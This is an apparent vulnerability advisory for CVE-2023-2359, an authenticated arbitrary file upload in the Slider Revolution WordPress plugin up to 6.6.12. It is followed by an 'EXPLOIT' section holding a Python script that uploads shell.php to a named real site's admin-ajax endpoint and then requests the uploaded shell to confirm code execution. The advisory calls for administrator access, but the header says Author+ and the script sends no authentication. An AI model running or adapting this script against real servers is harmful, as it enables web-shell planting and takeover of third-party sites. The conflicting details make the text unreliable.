Slider Revolution <= 6.6.12 - Authenticated (Administrator+) Arbitrary File Upload 7.2 Unrestricted Upload of File with Dangerous Type CVSS VectorCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H CVE CVE-2023-2359 CVSS 7.2 (High) Publicly Published May 22, 2023 Last Updated May 30, 2023 Researcher Marco Frison Description The Slider Revolution plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in versions up to, and including, 6.6.12. This makes it possible for authenticated attackers with administrator-level attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. While the default settings allow only administrators to exploit this vulnerability, this privilege can be granted to users as low as author. EXPLOIT : ################################### # online check and attack # Revolution Slider <= 6.6.12 - Author+ Remote Code Execution ################################### import unittest import requests class TestSliderRevolution(unittest.TestCase): def test_upload_file(self): url = "http://adroom.ir/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin" file = open("shell.php", "rb") data = {"update_file": file} response = requests.post(url, files=data) self.assertEqual(response.status_code, 200) self.assertIn("Update in progress", response.text) def test_execute_code(self): url = "http://adroom.ir/wp-content/plugins/revslider/temp/update_extract/revslider/shell.php" response = requests.get(url) self.assertEqual(response.status_code, 200) self.assertIn("Hello, world!", response.text) if __name__ == "__main__": unittest.main()
References:
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/revslider/slider-revolution-6612-authenticated-administrator-arbitrary-file-upload
https://wpscan.com/vulnerability/a8350890-e6d4-4b04-a158-2b0ee3748e65/
https://vuldb.com/?id.231920